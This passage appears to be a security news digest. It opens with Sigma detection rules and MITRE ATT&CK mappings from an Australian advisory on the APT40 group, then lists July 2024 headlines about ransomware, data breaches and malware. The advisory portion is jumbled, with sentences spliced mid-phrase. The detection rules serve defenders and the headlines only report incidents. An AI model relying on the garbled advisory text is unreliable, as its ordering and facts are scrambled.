                - ":\\Windows\\System32\\FxsTmp\\"
                - ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\"
                - ":\\Windows\\System32\\Speech\\"
                - ":\\Windows\\System32\\spool\\drivers\\color\\"
                - ":\\Windows\\System32\\spool\\PRINTERS\\"
                - ":\\Windows\\System32\\spool\\SERVERS\\"
                - ":\\Windows\\System32\\Tasks_Migrated\\Microsoft\\Windows\\PLA\\System\\"
                - ":\\Windows\\System32\\Tasks\\"
                - ":\\Windows\\SysWOW64\\Com\\dmp\\"
                - ":\\Windows\\SysWOW64\\FxsTmp\\"
                - ":\\Windows\\SysWOW64\\Tasks\\"
            appdata:
              Image|contains: "\\AppData\\"
              User: "SYSTEM"
            condition: writable_path and not appdata
          False positives: Allowlist auditing applications have been observed running executables from these directories.
          References: Process Execution from an Unusual Directory

          Author: ASD’s ACSC
          Date: 2024/06/19
          Status: experimental
          Tags: tlp.green classification.au.official attack.execution
          Log Source:
            category: process_creation
            product: windows
          Detection:
            temp:
              Image|startswith: "C:\\Windows\\Temp\\"
            common_temp_path:
              Image|re|ignorecase: "C:\\Windows\\Temp\\\{[a-fA-F0-9]{8}-([a-fA-F0-9]{4}-){3}[a-fA-F0-9]{12}\}\\"
            system_user:
              User:
                - "SYSTEM"
                - "NETWORK SERVICE"
            dismhost:
              Image|endswith: "dismhost.exe"
            known_parent:
              ParentImage|endswith:
                - "\\esif_uf.exe"
                - "\\vmtoolsd.exe"
                - "\\cwainstaller.exe"
                - "\\trolleyexpress.exe"
            condition: temp and not (common_temp_path or system_user or dismhost or known_parent)
          False positives: Allowlist auditing applications have been observed running executables from Temp.
          References: Process Execution from an Unusual Directory

          Author: ASD’s ACSC
          Date: 2024/06/19
          Status: experimental
          Tags: tlp.green classification.au.official attack.execution
          Log source:
            category: process_creation
            product: windows
          Detection:
            users:
              Image|contains:
                - ":\\Users\\All Users\\"
                - ":\\Users\\Contacts\\"
                - ":\\Users\\Default\\"
                - ":\\Users\\Public\\"
                - ":\\Users\\Searches\\"
            appdata:
              Image|contains: "\\AppData\\"
              User: "SYSTEM"
            condition: users and not appdata
          False positives: It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in Public or a subdirectory and should be addressed on a case-by-case basis.
          Execution
            T1059 – Command and Scripting Interpreter (regarding command execution through the web shell)
            T1072 – Software Deployment Tools (regarding the actor using open-source tool Secure Socket Funnelling (SSF) to connect to an IP)
          Persistence
            T1505.003 – Server Software Component: Web Shell (regarding use of a web shell and SSF to establish access)
          Credential Access
            T1552.001 – Credentials from Password Stores (regarding password files relating to building management system [BMS])
            T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting (regarding attack to gain network credentials)
          Lateral movement
            T1021.002 – Remote Services: SMB Shares (regarding the actor mounting SMB shares from multiple devices)
          Collection
            T1213 – Data from Information Repositories (regarding manuals/documentation found on the BMS server)
          Exfiltration
            T1041 – Exfiltration Over C2 Channel (regarding the actor’s data exfiltration from Active Directory and mounting shares)
          References: mattifestation / WorldWritableDirs.txt Process Execution from an 
Unusual Directory Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags: tlp.green classification.au.official attack.execution Log source: category: process_creation product: windows Detection:[T1098] Valid Accounts: Cloud Accounts [T1078.004] Valid Accounts: Domain Accounts [T1078.002] Privilege Escalation (TA0004) Scheduled Task/Job: At [T1053.002] Create or Modify System Process:Proxy: Multi-hop Proxy [T1090.003] Protocol Tunnelling [T1572] Web Service: Bidirectional Communication [T1102.002] Encrypted Channel [T1573] Encrypted Channel: Asymmetric Cryptography [T1573.002] Ingress Tool Transfer Key actor activity observed by the ASD’s ACSC included: Host enumeration, which enables an actor to build their own map of the network; Exploitation of internet-facing applications and web shell use, giving the actor an initial foothold on the network and a capability to execute commands; Exploitation of software vulnerabilities to escalate privileges; and Credential collection to enable lateral movement. 
From July to August, key actor activity observed by the ASD’s ACSC included: Host enumeration, which enables an actor to build their own map of the network; Web shell use, giving the actor an initial foothold on the network and a capability to execute commands; and Deployment of other tooling leveraged by the actor for malicious purposes.Python [T1059.006] Scheduled Task/Job: At [T1053.002] Command and Scripting Interpreter: JavaScript [T1059.007] Scheduled Task/Job: Scheduled Task [T1053.005] APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473).Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] Scheduled Task/Job: Cron [T1053.003] Hijack Execution Flow: DLL Side-Loading [T1574.002] Account Manipulation[T1587.002] Compromise Infrastructure [T1584] Develop Capabilities: Digital Certificates [T1587.003] Develop Capabilities: Malware [T1587.001]Unix Shell Configuration Modification [T1546.004] Process Injection: Dynamic-link Library Injection [T1055.001] Valid Accounts: Domain Accounts [T1078.002] Valid Accounts: Local AccountsLevel: high Title: World Writable Execution - Users ID: 6dda3843-182a-4214-9263-925a80b4c634 Description: Detect process execution from C:\Users\Public\* and other world writable folders within Users. Credential access T1056.003 Input Capture: Web Portal Capture Evidence on the compromised appliance showed that the actor had captured several hundred username-password pairs, in clear text, which are believed to be legitimate. 
The ASD’s ACSC assesses the following techniques and tactics to be relevant to the actor’s malicious activity: Reconnaissance T1594 – Search Victim-Owned Websites The actor enumerated the custom web application’s website to identify opportunities for accessing the network.Level: low Title: World Writable Execution - Non-Temp System Subdirectory ID: 5b187157-e892-4fc9-84fc-aa48aff9f997 Description:Masquerading: Match Legitimate Name or Location [T1036.005] Virtualisation/Sandbox Evasion: System Checks [T1497.001] Process Injection: Thread Execution Hijacking [T1055.003] Details Beginning in July, actors were able to test and exploit a custom web application [T1190] running on <webapp>2-ext , which enables the group to establish a foothold in the network demilitarized zone (DMZ). Figure 1: TTP Flowchart for APT40 activity This group appears to prefer exploiting vulnerable, public-facing infrastructure over techniques that require user interaction, such as phishing campaigns, and places a high priority on obtaining valid credentials to enable a range of follow-on activities. This initial access method is considered the most likely due to the following: The server was vulnerable to these CVEs at the time; Attempts to exploit these vulnerabilities from known actor infrastructure; and The first known internal malicious activity occurred shortly after attempted exploitation attempts were made. 
Using their access to the compromised appliance, the group collected genuine usernames, passwords [T1003], and MFA token values [T1111].However, it is likely that actors had access to all files on the compromised appliance, including the captured credentials [T1003], MFA token values [T1111], and JWTs described above.Attempted or successful malicious activity known to have impacted the internal organization’s network segment includes actor access to VDI-related artefacts, the scraping of an internal SQL server [T1505.001], and unexplained traffic observed going from known malicious IP addresses through the access gateway appliances [TA0011].[T1043] Web Service: One-way Communication [T1102.003] Application Layer Protocol: Web Protocols [T1071.001] Ingress Tool TransferAny reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.Level: medium Mitigations Logging During ASD’s ACSC investigations, a common issue that reduces the effectiveness and speed of investigative efforts is a lack of comprehensive and historical logging information across a number of areas including web server request logs, Windows event logs and internet proxy logs. APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. "


          Is AI the answer for better government services?

          government
          2024-07-08 https://www.bbc.com/news/articles/cmllxl89jlwo
          Governments are experimenting with AI chatbots that can give help and advice. "

          Autosummary: Those early chatbots "tended to be simpler, with limited conversational abilities," says Colin van Noordt, a researcher on the use of AI in government, and based in the Netherlands.But the emergence of generative AI in the last two years, has revived a vision of more efficient public service, where human-like advisors can work all hours, replying to questions over benefits, taxes and other areas where the government interacts with the public.“If Bürokratt does not know the answer, the chat will be handed over to customer support agent, who will take over the chat and will answer manually,” says Kai Kallas, head of the Personal Services Department at Estonia’s Information System Authority. "


          Alabama State Department of Education suffered a data breach following a blocked attack

          financial government
          2024-07-07 https://securityaffairs.com/165389/uncategorized/alabama-state-department-of-education-data-breach.html
          Alabama’s education superintendent disclosed a data breach following a hacking attempt on the Alabama State Department of Education. The Alabama State Department of Education announced it had thwarted a ransomware attack on June 17, however, threat actors accessed some data and disrupted services before the attack was stopped. Superintendent Eric Mackey, who disclosed the attack, […] "

          Autosummary: "


          Security Affairs Malware Newsletter – Round 1

          exploits
          2024-07-07 https://securityaffairs.com/165406/malware/security-affairs-malware-newsletter-round-1.html
          Today marks the launch of the Security Affairs newsletter, specializing in Malware. This newsletter complements the weekly one you already receive. Each week, it will feature a collection of the best articles and research on malware. CapraTube Remix | Transparent Tribe’s Android Spyware Targeting Gamers, Weapons Enthusiasts Supply Chain Compromise Leads to Trojanized Installers for […] "

          Autosummary: "


          Infostealing malware masquerading as generative AI tools

          exploits
          2024-07-05 https://www.helpnetsecurity.com/2024/07/05/infostealing-malware-generative-ai/

          Over the past six months, there has been a notable surge in Android financial threats – malware targeting victims’ mobile banking funds, whether in the form of ‘traditional’ banking malware or, more recently, cryptostealers, according to ESET. Vidar infostealer targets Windows users Infostealing malware can now be found impersonating generative AI tools, and new mobile malware GoldPickaxe is capable of stealing facial recognition data to create deepfake videos used by the malware’s operators to authenticate … More

          The post Infostealing malware masquerading as generative AI tools appeared first on Help Net Security.

          "

          Autosummary: Over the past six months, there has been a notable surge in Android financial threats – malware targeting victims’ mobile banking funds, whether in the form of ‘traditional’ banking malware or, more recently, cryptostealers, according to ESET. "


          99% of IoT exploitation attempts rely on previously known CVEs

          exploits industry
          2024-07-05 https://www.helpnetsecurity.com/2024/07/05/iot-security-privacy-challenges/

          The explosion of Internet of Things (IoT) devices has brought about a wide range of security and privacy challenges, according to Bitdefender and NETGEAR. The report is based on global telemetry of 3.8 million homes and 50 million IoT devices that generated 9.1 billion security events over the course of 12 months. High vulnerabilities found in TVs, smart plugs, DVRs With over 15 billion connected devices globally, from smart home appliances to industrial equipment, the … More

          The post 99% of IoT exploitation attempts rely on previously known CVEs appeared first on Help Net Security.

          "

          Autosummary: Across all device types, denial of service (DoS) attacks appear to be the most common type of vulnerability, with significant percentages observed for TV sets (36.7%), smart plugs (22.2%), DVRs (17.7%), routers (13.4%), and set-top boxes (6.9%). "


          GootLoader Malware Still Active, Deploys New Versions for Enhanced Attacks

          exploits
          2024-07-05 https://thehackernews.com/2024/07/gootloader-malware-delivers-new.html
          The malware known as GootLoader continues to be in active use by threat actors looking to deliver additional payloads to compromised hosts. "Updates to the GootLoader payload have resulted in several versions of GootLoader, with GootLoader 3 currently in active use," cybersecurity firm Cybereason said in an analysis published last week. "While some of the particulars of GootLoader payloads have "

          Autosummary: "


          New Eldorado ransomware targets Windows, VMware ESXi VMs

          exploits ransomware
          2024-07-05 https://www.bleepingcomputer.com/news/security/new-eldorado-ransomware-targets-windows-vmware-esxi-vms/
          A new ransomware-as-a-service (RaaS) called Eldorado emerged in March and comes with locker variants for VMware ESXi and Windows. [...] "

          Autosummary: The gang has already claimed 16 victims, most of them in the U.S., in real estate, educational, healthcare, and manufacturing sectors. "


          Mexico’s coast and tourist hotspots battered by Hurricane Beryl

          latam
          2024-07-05 https://www.bbc.com/news/articles/c3g60982178o
          Thousands in the region, home to tourist hotspots Tulum and Cancún, are being evacuated. "

          Autosummary: Mexico’s coast battered by Hurricane Beryl. By Ian Aikman, BBC News. Hurricane Beryl due to strengthen again after making landfall in Yucatan Peninsula. Hurricane Beryl has been lashing Mexico’s Yucatán Peninsula after wreaking havoc across the Caribbean. "


          Brazil Halts Meta’s AI Data Processing Amid Privacy Concerns

          latam
          2024-07-04 https://thehackernews.com/2024/07/brazil-halts-metas-ai-data-processing.html
          Brazil’s data protection authority, Autoridade Nacional de Proteção de Dados (ANPD), has temporarily banned Meta from processing users’ personal data to train the company’s artificial intelligence (AI) algorithms. The ANPD said it found "evidence of processing of personal data based on inadequate legal hypothesis, lack of transparency, limitation of the rights of data subjects, and risks to "

          Autosummary: "


          Hackers attack HFS servers to drop malware and Monero miners

          exploits
          2024-07-04 https://www.bleepingcomputer.com/news/security/hackers-attack-hfs-servers-to-drop-malware-and-monero-miners/
          Hackers are targeting older versions of the HTTP File Server (HFS) from Rejetto to drop malware and cryptocurrency mining software. [...] "

          Autosummary: Rejetto HFS 2.3m (Source: ASEC). Observed attacks: AhnLab SEcurity Intelligence Center (ASEC) observed attacks on version 2.3m of HFS, which continues to be very popular among individual users, small teams, educational institutions, and developers that want to test file sharing over a network. "


          Authy phone numbers accessed by cybercriminals, warns Twilio

          ciber
          2024-07-04 https://www.malwarebytes.com/blog/news/2024/07/authy-phone-numbers-accessed-by-cybercriminals-warns-twilio
          Authy users have been warned that their phone numbers have been obtained by cybercriminals that abused an unsecured API endpoint. "

          Autosummary: “In late June, a threat actor named ShinyHunters leaked a CSV text file containing what they claim are 33 million phone numbers registered with the Authy service.” "


          Healthcare fintech firm HealthEquity disclosed a data breach

          financial
          2024-07-04 https://securityaffairs.com/165228/data-breach/healthequity-disclosed-data-breach.html
          Healthcare firm HealthEquity disclosed a data breach caused by a partner’s compromised account that exposed protected health information. Healthcare fintech firm HealthEquity disclosed a data breach after a partner’s compromised account was used to access its systems. The intruders have stolen protected health information from the company systems. The company discovered an anomalous behavior from […] "

          Autosummary: “The Company does not currently believe the incident will have a material adverse effect on its business, operations, or financial results.” continues the Form 8-K. “The Company believes it holds adequate cybersecurity insurance for this incident and will also be seeking recourse from the Partner.” "


          Brazil data protection authority bans Meta from training AI models with data originating in the country

          latam government
          2024-07-04 https://securityaffairs.com/165216/social-networks/brazil-data-protection-authority-banned-meta-ai.html
          Brazil’s data protection authority temporarily banned Meta from using data originating in the country to train its artificial intelligence. Brazil’s data protection authority, Autoridade Nacional de Proteção de Dados (ANPD), has imposed a temporary ban on Meta from processing users’ personal data for training its artificial intelligence (AI) models. “The National Data Protection Authority (ANPD) issued […] "

          Autosummary: “The National Data Protection Authority (ANPD) issued today a Preventive Measure determining the immediate suspension, in Brazil, of the validity of the new privacy policy of the company Meta , which authorized the use of personal data published on its platforms for the purpose of training artificial intelligence (AI) systems.” reads the announcement published by ANPD. "


          Volcano Demon ransomware group rings its victims to extort money

          financial exploits ransomware
          2024-07-04 https://www.tripwire.com/state-of-security/volcano-demon-ransomware-group-rings-its-victims-extort-money
          Security researchers have warned that a new ransomware group has taken an unusual twist on the traditional method of extorting money from its corporate victims. Read more in my article on the Tripwire State of Security blog. "

          Autosummary: Yes, and it’s much more likely that a member of staff outside your cybersecurity team finds themselves in the prickly position of acting as a negotiator, unlike a demand that arrives via an email or a ransom note dropped by the cybercriminals on your compromised network. Whereas many ransomware attacks see a company’s data exfiltrated by attackers, and the threat made that stolen data will be sold to other cybercriminals or released to the public, the Volcano Demon gang... Security researchers at Halcyon, which has reported seeing at least two successful attacks perpetrated by Volcano Demon in the last week, say that the calls can be threatening in nature and come from unidentified caller-ID numbers. "


          Cybersecurity jobs available right now: July 3, 2024

          ciber
          2024-07-03 https://www.helpnetsecurity.com/2024/07/03/cybersecurity-jobs-available-right-now-july-3-2024/

          CISO Atera | Israel | On-site – View job details The CISO will oversee our company’s information, cyber, and technology security and will have end to end full responsibility developing, implementing, and enforcing security policies, procedures, and protocols to protect critical data. Cyber Defense Specialist Explora Journeys | Italy | On-site – View job details As a Cyber Defense Specialist, you will operate and optimize security tooling/products, including security email gateway, firewall, IDS/IPS, web security … More

          The post Cybersecurity jobs available right now: July 3, 2024 appeared first on Help Net Security.

          "

          Autosummary: Responsibilities include: managing the delivery of technical security assurance testing to our clients, from initial project scoping, test execution and reporting; Delivering cybersecurity testing services, such as but not limited to penetration testing services (including web App, Mobile App, and network), vulnerability assessments, phishing campaigns, and red teaming exercises; Undertaking security assessments of technical Infrastructure including, for example: M365, Google Cloud, Azure, AWS, backups, Networks. Do the Consulting for local PCT on IT related technical issues on security aspects of process automation systems (e.g. domains, network segmentation, ICS upgrade, time synchronization, license management, firewalls, patching, server hardening, SIEM, PAM, remote access, network monitoring, etc.). Cyber Defense Specialist Explora Journeys | Italy | On-site – View job details As a Cyber Defense Specialist, you will operate and optimize security tooling/products, including security email gateway, firewall, IDS/IPS, web security gateway, emergency detect and response, logging and auditing, event and incident management, privileged access management and authentication. Determine cyber threat resource requirements, availability, adequacy, and define gap between cyber threat emulation capability and the actual threat Senior Security Architect II Electronic Arts | Canada | Hybrid – View job details As a Senior Security Architect II, you will lead complex design assessments on EA user generated experience (UGX) products hosted in the Cloud and running on PC, web, mobile, and consoles, identifying and driving the remediation of security and gameplay integrity issues. 
"


          Companies spend more on cybersecurity but struggle to track expenses

          ciber
          2024-07-03 https://www.helpnetsecurity.com/2024/07/03/cybersecurity-budgets-approach/

          Most companies do not know how effectively they are investing money to fight the cybersecurity threat, according to Optiv. Cybersecurity budgets are increasing and cyber incidents are rampant, and yet only a small percentage of respondents have a formal approach to determining cybersecurity budgets, which can lead to inefficiencies and missed opportunities to address critical security gaps. Lack of formal approach to cybersecurity budgets Based on an independent Ponemon Institute survey, the report reveals a … More

          The post Companies spend more on cybersecurity but struggle to track expenses appeared first on Help Net Security.

          "

          Autosummary: More companies are leveraging AI in the form of use and prevention: 44% of respondents use AI/ML to prevent cyberattacks; 35% purchased use-case specific tools; 31% use existing tools; 34% use automated processes and audits. “Our independent research for Optiv reveals the positive steps organizations are taking to reduce risk, while also addressing the challenges they face in the evolving cyber threat landscape,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute. "


          Israeli Entities Targeted by Cyberattack Using Donut and Sliver Frameworks

          ciber
          2024-07-03 https://thehackernews.com/2024/07/israeli-entities-targeted-by.html
          Cybersecurity researchers have discovered an attack campaign that targets various Israeli entities with publicly-available frameworks like Donut and Sliver. The campaign, believed to be highly targeted in nature, "leverage target-specific infrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities across unrelated verticals, and rely on "

          Autosummary: "


          South Korean ERP Vendor's Server Hacked to Spread Xctdoor Malware

          exploits
          2024-07-03 https://thehackernews.com/2024/07/south-korean-erp-vendors-server-hacked.html
          An unnamed South Korean enterprise resource planning (ERP) vendor's product update server has been found to be compromised to deliver a Go-based backdoor dubbed Xctdoor. The AhnLab Security Intelligence Center (ASEC), which identified the attack in May 2024, did not attribute it to a known threat actor or group, but noted that the tactics overlap with that of Andariel, a sub-cluster within the "

          Autosummary: "


          Microsoft MSHTML Flaw Exploited to Deliver MerkSpy Spyware Tool

          exploits
          2024-07-03 https://thehackernews.com/2024/07/microsoft-mshtml-flaw-exploited-to.html
          Unknown threat actors have been observed exploiting a now-patched security flaw in Microsoft MSHTML to deliver a surveillance tool called MerkSpy as part of a campaign primarily targeting users in Canada, India, Poland, and the U.S. "MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems," Fortinet FortiGuard "

          Autosummary: Unknown threat actors have been observed exploiting a now-patched security flaw in Microsoft MSHTML to deliver a surveillance tool called MerkSpy as part of a campaign primarily targeting users in Canada, India, Poland, and the U.S. "MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems," Fortinet FortiGuard Labs researcher Cara Lin said in a report published last week. "


          FakeBat Loader Malware Spreads Widely Through Drive-by Download Attacks

          exploits
          2024-07-03 https://thehackernews.com/2024/07/fakebat-loader-malware-spreads-widely.html
          The loader-as-a-service (LaaS) known as FakeBat has become one of the most widespread loader malware families distributed using the drive-by download technique this year, findings from Sekoia reveal. "FakeBat primarily aims to download and execute the next-stage payload, such as IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif," the company said in a Tuesday analysis. Drive-by attacks "

          Autosummary: "FakeBat primarily aims to download and execute the next-stage payload, such as IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif," the company said in a Tuesday analysis. "


          Polish government investigates Russia-linked cyberattack on state news agency

          government ciber
          2024-07-03 https://securityaffairs.com/165139/intelligence/polish-government-investigating-russia-attack.html
          The Polish government is investigating a potential connection between Russia and a cyberattack on the country’s state news agency. The Polish government is investigating a suspected link between Russia and the cyberattack on the country’s state news agency Polish Press Agency (PAP). “The Polish Press Agency (PAP) has been hit by a cyberattack; all pertinent […] "

          Autosummary: Polish government investigates Russia-linked cyberattack on state news agency Pierluigi Paganini July 03, 2024 The Polish government is investigating a potential connection between Russia and a cyberattack on the country’s state news agency. "


          Affirm says Evolve Bank data breach also compromised some of its customers

          financial
          2024-07-03 https://www.malwarebytes.com/blog/news/2024/07/affirm-says-evolve-bank-data-breach-also-compromised-some-of-its-customers
          Buy now and pay later provider Affirm has notified the SEC that customer data of its card users was compromised in the Evolve data breach. "

          Autosummary: Money transfer service and payment platform builder Wise also published a statement on its website, informing customers it had shared full names, addresses, contact details, Social Security numbers, and other sensitive information with Evolve as part of a partnership between 2020 and 2023. In a form 8-K, submitted to the Securities and Exchange Commission (SEC), Affirm states: “Because the Company [Affirm Holdings, Inc] shares the Personal Information of Affirm Card users with Evolve to facilitate the issuance and servicing of Affirm Cards, the Company believes that the Personal Information of Affirm Card users was compromised as part of Evolve’s cybersecurity incident.” Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


          American Patelco Credit Union suffered a ransomware attack

          exploits ransomware Telcos
          2024-07-03 https://securityaffairs.com/165152/hacking/patelco-credit-union-ransomware-attack.html
          The American credit union Patelco Credit Union shut down several of its banking systems to contain a ransomware attack. Patelco Credit Union is a member-owned, not-for-profit credit union that serves Northern California, particularly the San Francisco Bay Area. Founded in 1936, it is one of the oldest and largest credit unions in the country. With more […] "

          Autosummary: "


          In pictures: Hurricane Beryl devastates Caribbean islands

          government
          2024-07-03 https://www.bbc.com/news/articles/cn09gn5pvqqo
          Barbados, St Vincent and Grenada are recovering as the storm heads to Jamaica "

          Autosummary: "


          Formula 1 governing body discloses data breach after email hacks

          financial
          2024-07-03 https://www.bleepingcomputer.com/news/security/formula-1-governing-body-discloses-data-breach-after-email-hacks/
          FIA (Fédération Internationale de l'Automobile), the auto racing governing body since the 1950s, says attackers gained access to personal data after compromising several FIA email accounts in a phishing attack. [...] "

          Autosummary: "


          Infostealer malware logs used to identify child abuse website members

          exploits
          2024-07-03 https://www.bleepingcomputer.com/news/security/infostealer-malware-logs-used-to-identify-child-abuse-website-members/
          Thousands of pedophiles who download and share child sexual abuse material (CSAM) were identified through information-stealing malware logs leaked on the dark web, highlighting a new dimension of using stolen credentials in law enforcement investigations. [...] "

          Autosummary: Accounts linked to known CSAM sites (Source: Recorded Future). As information-stealing malware steals all credentials saved in a browser, the researchers were able to link CSAM account holders to their legal online accounts, such as email, banking, online shopping, mobile carriers, and social media. "


          Europol takes down 593 Cobalt Strike servers used by cybercriminals

          ciber
          2024-07-03 https://www.bleepingcomputer.com/news/security/europol-takes-down-593-cobalt-strike-servers-used-by-cybercriminals/
          Europol coordinated a joint law enforcement action known as Operation Morpheus, which led to the takedown of almost 600 Cobalt Strike servers used by cybercriminals to infiltrate victims' networks. [...] "

          Autosummary: Private industry partners like BAE Systems Digital Intelligence, Trellix, Spamhaus, abuse.ch, and The Shadowserver Foundation also offered their support during this international law enforcement operation, providing help via their enhanced scanning, telemetry, and analytical capabilities to identify Cobalt Strike servers used in cybercriminal campaigns. "


          LockBit group claims the hack of the Fairfield Memorial Hospital in the US

          ransomware
          2024-07-03 https://securityaffairs.com/165162/cyber-crime/lockbit-ransomware-fairfield-memorial-hospital.html
          The LockBit ransomware group breached another hospital in the United States; the victim is the Fairfield Memorial Hospital in Illinois. It has happened again: another US healthcare organization suffered a security breach, this time the Fairfield Memorial Hospital in Illinois. Fairfield Memorial Hospital is a not-for-profit critical access hospital located in Fairfield, […] "

          Autosummary: It offers a wide range of medical services, including Emergency Services, General Surgical Services, Intensive Care Unit (ICU), Medical Surgical Unit, Orthopedic Surgical Services, and Urgent Care. "


          Brazil blocks Meta from using social media posts to train AI

          latam
          2024-07-03 https://www.bbc.com/news/articles/c7291l3nvwvo
          Brazil's data protection regulator says it aims to protect users; the company says it is disappointed. "

          Autosummary: In Europe, the policy change would include posts, images, image captions, comments and Stories that users over the age of 18 had shared with a public audience on Facebook and Instagram, but not private messages. "


          HealthEquity data breach exposes protected health information

          financial
          2024-07-03 https://www.bleepingcomputer.com/news/security/healthequity-data-breach-exposes-protected-health-information/
          Healthcare fintech firm HealthEquity is warning that it suffered a data breach after a partner's account was compromised and used to access the Company's systems to steal protected health information. [...] "

          Autosummary: "


          No room for error: Don’t get stung by these common Booking.com scams

          financial
          2024-07-03 https://www.welivesecurity.com/en/scams/common-bookingcom-scams/
          From sending phishing emails to posting fake listings, here’s how fraudsters hunt for victims while you’re booking your well-earned vacation "

          Autosummary: By generating phishing emails that are grammatically correct, contextually appropriate, and free of typical red flags that might alert the recipient, they can easily trick people and businesses into downloading info-stealing malware on their devices or into divulging sensitive information or transferring money. Look for reviews and ratings for the place, check if the price is roughly similar to those for “competing” houses or apartments, and reverse-search the image to see what comes up – it is likely a free stock image or it was stolen from other websites. Booking.com never asks for information like your full credit card details, social security number, or passwords via email or chat. "


          Chinese Hackers Exploiting Cisco Switches Zero-Day to Deliver Malware

          exploits
          2024-07-02 https://thehackernews.com/2024/07/chinese-hackers-exploiting-cisco.html
          A China-nexus cyber espionage group named Velvet Ant has been observed exploiting a zero-day flaw in Cisco NX-OS Software used in its switches to deliver malware. The vulnerability, tracked as CVE-2024-20399 (CVSS score: 6.0), concerns a case of command injection that allows an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected "

          Autosummary: "


          Australian Man Charged for Fake Wi-Fi Scam on Domestic Flights

          financial
          2024-07-02 https://thehackernews.com/2024/07/australian-man-charged-for-fake-wi-fi.html
          An Australian man has been charged with running a fake Wi-Fi access point during a domestic flight with an aim to steal user credentials and data. The unnamed 42-year-old "allegedly established fake free Wi-Fi access points, which mimicked legitimate networks, to capture personal data from unsuspecting victims who mistakenly connected to them," the Australian Federal Police (AFP) said in a press "

          Autosummary: "


          China-linked APT exploited Cisco NX-OS zero-day to deploy custom malware

          exploits
          2024-07-02 https://securityaffairs.com/165097/apt/cisco-nx-os-zero-day-chinese-hackers.html
          Cisco fixed an actively exploited NX-OS zero-day; the flaw was exploited to install previously unknown malware as root on vulnerable switches. Cisco addressed an NX-OS zero-day, tracked as CVE-2024-20399 (CVSS score of 6.0), that the China-linked group Velvet Ant exploited to deploy previously unknown malware as root on vulnerable switches. The flaw resides in the […] "

          Autosummary: The vulnerability impacts the following devices: MDS 9000 Series Multilayer Switches (CSCwj97007); Nexus 3000 Series Switches (CSCwj97009); Nexus 5500 Platform Switches (CSCwj97011); Nexus 5600 Platform Switches (CSCwj97011); Nexus 6000 Series Switches (CSCwj97011); Nexus 7000 Series Switches (CSCwj94682); Nexus 9000 Series Switches in standalone NX-OS mode (CSCwj97009). Cisco recommends customers monitor the use of credentials for the administrative users network-admin and vdc-admin. "


          Google Pixel 6 series phones bricked after factory reset

          industry
          2024-07-02 https://www.bleepingcomputer.com/news/google/google-pixel-6-series-phones-bricked-after-factory-reset/
          Multiple owners of Google Pixel 6 series phones (6, 6a, 6 Pro) have been reporting in the past week that their devices were "bricked" after they performed a factory reset. [...] "

          Autosummary: Until the situation clears up, Google Pixel 6, 6a, and 6 Pro owners should not perform factory resets and take regular backups on a separate device. "


          Prudential Financial data breach impacts 2.5 million people, not 36,000 as first thought

          financial
          2024-07-02 https://www.malwarebytes.com/blog/news/2024/07/prudential-financial-data-breach-impacts-2-5-million-people-not-36000-as-first-thought
          It turns out that a breach at the Prudential impacted a lot more people than was initially thought. The company is now offering identity monitoring to affected customers. "

          Autosummary: However, Prudential is now saying the stolen data also impacted many customers and included: full names; driving license numbers; non-driving license identification cards. The data breach notification states that the company will be giving affected customers 24 months of identity theft and credit monitoring services through Kroll. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


          How MFA Failures are Fueling a 500% Surge in Ransomware Losses

          exploits ransomware
          2024-07-02 https://thehackernews.com/2024/07/how-mfa-failures-are-fueling-500-surge.html
          The cybersecurity threat landscape has witnessed a dramatic and alarming rise in the average ransomware payment, an increase exceeding 500%. Sophos, a global leader in cybersecurity, revealed in its annual "State of Ransomware 2024" report that the average ransom payment has increased 500% in the last year with organizations that paid a ransom reporting an average payment of $2 million, up from "

          Autosummary: In summary, user convenience in MFA solutions is essential to ensure high adoption rates, reduce errors and support costs, enhance security, maintain productivity, and improve overall user satisfaction. However, legacy MFA systems including Knowledge Based Authentication (KBA), One Time Passwords (OTP), and authentication apps, developed twenty years ago, are increasingly inadequate against modern cyberattacks. The Case for Implementing Next-Generation MFA: To effectively combat the virtual tsunami of ransomware attacks, organizations must consider phishing-resistant, next-generation MFA technologies. Separately, RISK & INSURANCE, a leading media source for the insurance industry, reported recently that in 2023 the median ransom demand soared to $20 million from $1.4 million in 2022, and payment skyrocketed to $6.5 million in 2023 from $335,000 in 2022, much more than 500%. "


          New Intel CPU Vulnerability "Indirector" Exposes Sensitive Data

          exploits
          2024-07-02 https://thehackernews.com/2024/07/new-intel-cpu-vulnerability-indirector.html
          Modern CPUs from Intel, including Raptor Lake and Alder Lake, have been found vulnerable to a new side-channel attack that could be exploited to leak sensitive information from the processors. The attack, codenamed Indirector by security researchers Luyi Li, Hosein Yavarzadeh, and Dean Tullsen, leverages shortcomings identified in Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB "

          Autosummary: "


          Prudential Financial data breach impacted over 2.5 million individuals

          financial
          2024-07-02 https://securityaffairs.com/165121/data-breach/prudential-financial-data-breach-2-5m-individuals.html
          Prudential Financial confirmed that more than 2.5 million individuals were affected by the data breach it suffered in February 2024. The insurance company Prudential Financial confirmed that the data breach it suffered in February 2024 affected over 2.5 million individuals. The incident occurred on February 4, 2024, and was discovered on February 5, 2024. The company […] "

          Autosummary: "


          Google now pays $250,000 for KVM zero-day vulnerabilities

          exploits
